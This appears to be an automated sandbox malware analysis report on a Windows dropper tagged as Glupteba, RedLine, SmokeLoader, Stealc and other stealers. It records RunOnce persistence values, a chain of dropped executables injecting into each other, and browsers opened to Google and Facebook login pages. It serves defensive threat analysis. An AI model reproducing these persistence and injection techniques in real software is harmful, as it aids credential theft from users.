Malware Analysis Report

2024-11-13 19:11

Sample ID 231111-z4w4ksbf4s
Target afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733
SHA256 afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733
Tags
glupteba mystic redline smokeloader stealc zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733

Threat Level: Known bad

The file afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733 was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline smokeloader stealc zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat spyware stealer trojan

ZGRat

Glupteba payload

SmokeLoader

Mystic

RedLine

Stealc

Glupteba

Detect Mystic stealer payload

RedLine payload

Detect ZGRat V1

Downloads MZ/PE file

Stops running service(s)

Executes dropped EXE

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 21:16

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 21:16

Reported

2023-11-11 21:19

Platform

win10v2004-20231023-en

Max time kernel

39s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Stops running service(s)

evasion

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3620 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe
PID 3620 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe
PID 3620 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe
PID 2100 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe
PID 2100 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe
PID 2100 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe
PID 2344 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe
PID 2344 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe
PID 2344 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe
PID 3668 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe
PID 3668 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe
PID 3668 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe
PID 3340 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 836 wrote to memory of 1900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 836 wrote to memory of 1900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3752 wrote to memory of 4460 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3752 wrote to memory of 4460 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2120 wrote to memory of 4116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2120 wrote to memory of 4116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1464 wrote to memory of 3880 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1464 wrote to memory of 3880 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4344 wrote to memory of 812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4344 wrote to memory of 812 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3588 wrote to memory of 872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3588 wrote to memory of 872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3944 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3944 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4812 wrote to memory of 3660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4812 wrote to memory of 3660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4652 wrote to memory of 2228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4652 wrote to memory of 2228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3668 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe
PID 3668 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe
PID 3668 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe
PID 4324 wrote to memory of 1968 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 1968 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 1968 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 1968 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 1968 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 1968 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 1968 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 1968 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4324 wrote to memory of 1968 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe

"C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

